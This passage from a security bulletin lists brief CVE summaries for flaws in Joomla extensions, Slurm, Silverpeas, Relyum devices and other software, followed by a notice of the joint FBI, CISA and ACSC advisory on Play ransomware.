joomla — joomla SQLi vulnerability in S5 Register module for Joomla. 2023-12-14 not yet calculated CVE-2023-49707
security@joomla.org
joomla — joomla SQLi vulnerability in Starshop component for Joomla. 2023-12-14 not yet calculated CVE-2023-49708
security@joomla.org
kubeflow — kubeflow/kubeflow Server-Side Request Forgery (SSRF) in kubeflow/kubeflow 2023-12-14 not yet calculated CVE-2023-6570
security@huntr.dev
kubeflow — kubeflow/kubeflow Cross-site Scripting (XSS) – Reflected in kubeflow/kubeflow 2023-12-14 not yet calculated CVE-2023-6571
security@huntr.dev
lockss-daemon — lockss-daemon lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick. 2023-12-15 not yet calculated CVE-2023-42183
cve@mitre.org
majordomo — majordomo MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. 2023-12-15 not yet calculated CVE-2023-50917
cve@mitre.org
microweber — microweber Business Logic Errors in GitHub repository microweber/microweber prior to 2.0. 2023-12-15 not yet calculated CVE-2023-6832
security@huntr.dev
misp — misp app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs. 2023-12-15 not yet calculated CVE-2023-50918
cve@mitre.org
mlflow — mlflow Path Traversal: ‘..filename’ in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-15 not yet calculated CVE-2023-6831
security@huntr.dev
mozilla — nss The NSS code used for checking PKCS#1 v1.5 was leaking information useful in mounting Bleichenbacher-like attacks. Both the overall correctness of the padding and the length of the encrypted message were leaking through a timing side channel. By sending a large number of attacker-selected ciphertexts, the attacker would be able to decrypt a previously intercepted PKCS#1 v1.5 ciphertext (for example, to decrypt a TLS session that used RSA key exchange), or forge a signature using the victim’s key. The issue was fixed by implementing the implicit rejection algorithm, in which NSS returns a deterministic random message in case invalid padding is detected, as proposed in the Marvin Attack paper. This vulnerability affects NSS < 3.61. 2023-12-12 not yet calculated CVE-2023-4421
security@mozilla.org
nagios — nagios_xi Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool. 2023-12-14 not yet calculated CVE-2023-48084
cve@mitre.org
nagios — nagios_xi Nagios XI before version 5.11.3 was discovered to contain a remote code execution (RCE) vulnerability via the component command_test.php. 2023-12-14 not yet calculated CVE-2023-48085
cve@mitre.org
netgear — wnr2000v4 A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication. 2023-12-15 not yet calculated CVE-2023-50089
cve@mitre.org
opc_foundation — opc_ua_.net_standard_reference_server The OPC UA .NET Standard Reference Server before 1.4.371.86 places sensitive information into an error message that may be seen remotely. 2023-12-12 not yet calculated CVE-2023-31048
cve@mitre.org
parallels — parallels_ras The Remote Application Server in Parallels RAS before 19.2.23975 does not segment virtualized applications from the server, which allows a remote attacker to achieve remote code execution via standard kiosk breakout techniques. 2023-12-14 not yet calculated CVE-2023-45894
cve@mitre.org
phpmyfaq — phpmyfaq Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. 2023-12-16 not yet calculated CVE-2023-6889
security@huntr.dev
phpmyfaq — phpmyfaq Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. 2023-12-16 not yet calculated CVE-2023-6890
security@huntr.dev
pluck-cms — pluck-cms An arbitrary file upload vulnerability in the component /inc/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file. 2023-12-14 not yet calculated CVE-2023-50564
cve@mitre.org
plutosvg — plutosvg PlutoSVG commit 336c02997277a1888e6ccbbbe674551a0582e5c4 and before was discovered to contain an integer overflow via the component plutosvg_load_from_memory. 2023-12-14 not yet calculated CVE-2023-44709
cve@mitre.org
popojicms — popojicms PopojiCMS version 2.0.1 is vulnerable to remote command execution in the Meta Social field. 2023-12-14 not yet calculated CVE-2023-50011
cve@mitre.org
prestashop — sunnytoo_sturls SQL injection vulnerability in SunnyToo sturls before version 1.1.13 allows attackers to escalate privileges and obtain sensitive information via the StUrls::hookActionDispatcher and StUrls::getInstanceId methods. 2023-12-14 not yet calculated CVE-2023-46348
cve@mitre.org
primx_zed! — zed_containers ZED containers produced by PRIMX ZED! for Windows before Q.2020.3 (ANSSI qualification submission), ZED! for Windows before Q.2021.2 (ANSSI qualification submission), ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission), ZONECENTRAL for Windows before 2023.5, or ZEDMAIL for Windows before 2023.5 disclose the original path in which the containers were created, which allows an unauthenticated attacker to obtain some information regarding the context of use (project name, etc.). 2023-12-13 not yet calculated CVE-2023-50439
cve@mitre.org
primx_zed! — zed_containers ZED containers produced by PRIMX ZED! for Windows before Q.2020.3 (ANSSI qualification submission); ZED! for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before 2023.5; ZEDMAIL for Windows before 2023.5; ZED! for Windows, Mac, Linux before 2023.5; ZEDFREE for Windows, Mac, Linux before 2023.5; or ZEDPRO for Windows, Mac, Linux before 2023.5 can be modified by an unauthenticated attacker to include a UNC reference so that it could trigger network access to an attacker-controlled computer when opened by the victim. 2023-12-13 not yet calculated CVE-2023-50440
cve@mitre.org
primx_zonecentral — encrypted_disks Encrypted disks created by PRIMX CRYHOD for Windows before Q.2020.4 (ANSSI qualification submission) or CRYHOD for Windows before 2023.5 can be modified by an unauthenticated attacker to include a UNC reference so that it could trigger outbound network traffic from computers on which disks are opened. 2023-12-13 not yet calculated CVE-2023-50443
cve@mitre.org
primx_zonecentral — encrypted_folders Encrypted folders created by PRIMX ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission) or ZONECENTRAL for Windows before 2023.5 can be modified by an unauthenticated attacker to include a UNC reference so that it could trigger outbound network traffic from computers on which folders are opened. 2023-12-13 not yet calculated CVE-2023-50441
cve@mitre.org
primx_zonecentral — encrypted_folders Encrypted folders created by PRIMX ZONECENTRAL through 2023.5 can be modified by a local attacker (with appropriate privileges) so that specific file types are excluded from encryption temporarily. (This modification can, however, be detected, as described in the Administrator Guide.) 2023-12-13 not yet calculated CVE-2023-50442
cve@mitre.org
primx_zonecentral — multiple_products By default, .ZED containers produced by PRIMX ZED! for Windows before Q.2020.3 (ANSSI qualification submission); ZED! for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before Q.2021.2 (ANSSI qualification submission); ZONECENTRAL for Windows before 2023.5; ZEDMAIL for Windows before 2023.5; and ZED! for Windows, Mac, Linux before 2023.5 include an encrypted version of sensitive user information, which could allow an unauthenticated attacker to obtain it via brute force. 2023-12-13 not yet calculated CVE-2023-50444
cve@mitre.org
relyum — multiple_products An issue was discovered on Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices. There is a Weak SMB configuration with signing disabled. 2023-12-13 not yet calculated CVE-2023-47574
cve@mitre.org
relyum — multiple_products An issue was discovered on Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices. The web interfaces of the Relyum devices are susceptible to reflected XSS. 2023-12-13 not yet calculated CVE-2023-47575
cve@mitre.org
relyum — multiple_products An issue was discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices, allowing authenticated command injection through the web interface. 2023-12-13 not yet calculated CVE-2023-47576
cve@mitre.org
relyum — multiple_products An issue discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 allows for unauthorized password changes due to no check for current password. 2023-12-13 not yet calculated CVE-2023-47577
cve@mitre.org
relyum — multiple_products Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices are susceptible to Cross Site Request Forgery (CSRF) attacks due to the absence of CSRF protection in the web interface. 2023-12-13 not yet calculated CVE-2023-47578
cve@mitre.org
relyum — rely-pcle Relyum RELY-PCIe 22.2.1 devices suffer from a system group misconfiguration, allowing read access to the central password hash file of the operating system. 2023-12-13 not yet calculated CVE-2023-47579
cve@mitre.org
rockoa — rockoa Rockoa <2.3.3 is vulnerable to SQL Injection. The problem exists in the indexAction method in reimpAction.php. 2023-12-13 not yet calculated CVE-2023-49363
cve@mitre.org
rpcms — rpcms A cross-site scripting (XSS) vulnerability in the component /logs/dopost.html in RPCMS v3.5.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. 2023-12-14 not yet calculated CVE-2023-50565
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. There is Improper Enforcement of Message Integrity During Transmission in a Communication Channel. This allows attackers to modify RPC traffic in a way that bypasses message hash checks. The fixed versions are 22.05.11, 23.02.7, and 23.11.1. 2023-12-14 not yet calculated CVE-2023-49933
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 23.11.x. There is SQL Injection against the SlurmDBD database. The fixed version is 23.11.1. 2023-12-14 not yet calculated CVE-2023-49934
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 23.02.x and 23.11.x. There is Incorrect Access Control because of a slurmd Message Integrity Bypass. An attacker can reuse root-level authentication tokens during interaction with the slurmd process. This bypasses the RPC message hashes that protect against undesired MUNGE credential reuse. The fixed versions are 23.02.7 and 23.11.1. 2023-12-14 not yet calculated CVE-2023-49935
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. A NULL pointer dereference leads to denial of service. The fixed versions are 22.05.11, 23.02.7, and 23.11.1. 2023-12-14 not yet calculated CVE-2023-49936
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. Because of a double free, attackers can cause a denial of service or possibly execute arbitrary code. The fixed versions are 22.05.11, 23.02.7, and 23.11.1. 2023-12-14 not yet calculated CVE-2023-49937
cve@mitre.org
schedmd — slurm An issue was discovered in SchedMD Slurm 22.05.x and 23.02.x. There is Incorrect Access Control: an attacker can modify their extended group list that is used with the sbcast subsystem, and open files with an unauthorized set of extended groups. The fixed versions are 22.05.11 and 23.02.7. 2023-12-14 not yet calculated CVE-2023-49938
cve@mitre.org
semcms — semcms Semcms v4.8 was discovered to contain a SQL injection vulnerability via the AID parameter at SEMCMS_Function.php. 2023-12-14 not yet calculated CVE-2023-50563
cve@mitre.org
shenzhen_libituo_technology_co.,_ltd — lbt-7300-t310 Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi. 2023-12-15 not yet calculated CVE-2023-50469
cve@mitre.org
silverpeas — core Silverpeas Core 6.3.1 is vulnerable to Cross Site Scripting (XSS) via the message/notification feature. 2023-12-13 not yet calculated CVE-2023-47324
cve@mitre.org
silverpeas — core Silverpeas Core 6.3.1 administrative “Bin” feature is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces. 2023-12-13 not yet calculated CVE-2023-47325
cve@mitre.org
silverpeas — core Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. 2023-12-13 not yet calculated CVE-2023-47326
cve@mitre.org
silverpeas — core The “Create a Space” feature in Silverpeas Core 6.3.1 is reserved for use by administrators. This function suffers from broken access control, allowing any authenticated user to create a space by navigating to the correct URL. 2023-12-13 not yet calculated CVE-2023-47327
cve@mitre.org
softing — opc_ua_c++_sdk An uncaught exception issue discovered in Softing OPC UA C++ SDK before 6.30 for Windows operating system may cause the application to crash when the server wants to send an error packet, while socket is blocked on writing. 2023-12-14 not yet calculated CVE-2023-41151
cve@mitre.org
tinyxml — tinyxml StringEqual in TiXmlDeclaration::Parse in tinyxmlparser.cpp in TinyXML through 2.6.2 has a reachable assertion (and application exit) via a crafted XML document with a ‘’ located after whitespace. 2023-12-13 not yet calculated CVE-2023-34194
cve@mitre.org
uffizio — gps_tracker An improper access control vulnerability exists in all versions of Uffizio’s GPS Tracker that leads to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed. 2023-12-16 not yet calculated CVE-2020-17483
cve@mitre.org
uffizio — gps_tracker An Open Redirection vulnerability exists in all versions of Uffizio’s GPS Tracker that allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain. 2023-12-16 not yet calculated CVE-2020-17484
cve@mitre.org
uffizio — gps_tracker A Remote Code Execution vulnerability exists in all versions of Uffizio’s GPS Tracker. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources. 2023-12-16 not yet calculated CVE-2020-17485
cve@mitre.org
unrealircd — unrealircd A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms. 2023-12-16 not yet calculated CVE-2023-50784
cve@mitre.org
vmware — workspace_one_launcher Workspace ONE Launcher contains a Privilege Escalation Vulnerability. A malicious actor with physical access to Workspace ONE Launcher could utilize the Edge Panel feature to bypass setup to gain access to sensitive information. 2023-12-12 not yet calculated CVE-2023-34064
security@vmware.com
wordpress — wordpress Dokmee ECM 7.4.6 allows remote code execution because the response to a GettingStarted/SaveSQLConnectionAsync /#/gettingstarted request contains a connection string for privileged SQL Server database access, and xp_cmdshell can be enabled. 2023-12-14 not yet calculated CVE-2023-47261
cve@mitre.org


FBI, CISA, and ASD’s ACSC Release Advisory on Play Ransomware

Today, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a joint Cybersecurity Advisory (CSA), #StopRansomware: Play Ransomware, to disseminate Play ransomware group’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified through FBI investigations as recently as October 2023.

Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data, and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia.

FBI, CISA, and the ASD’s ACSC encourage organizations to review and implement the recommendations provided in the joint CSA to reduce the likelihood and impact of Play and other ransomware incidents. For more information, see CISA’s #StopRansomware webpage, which includes the updated #StopRansomware Guide.

For Emergency Cyber Security Incident Response please email RedTeam@DefendEdge.com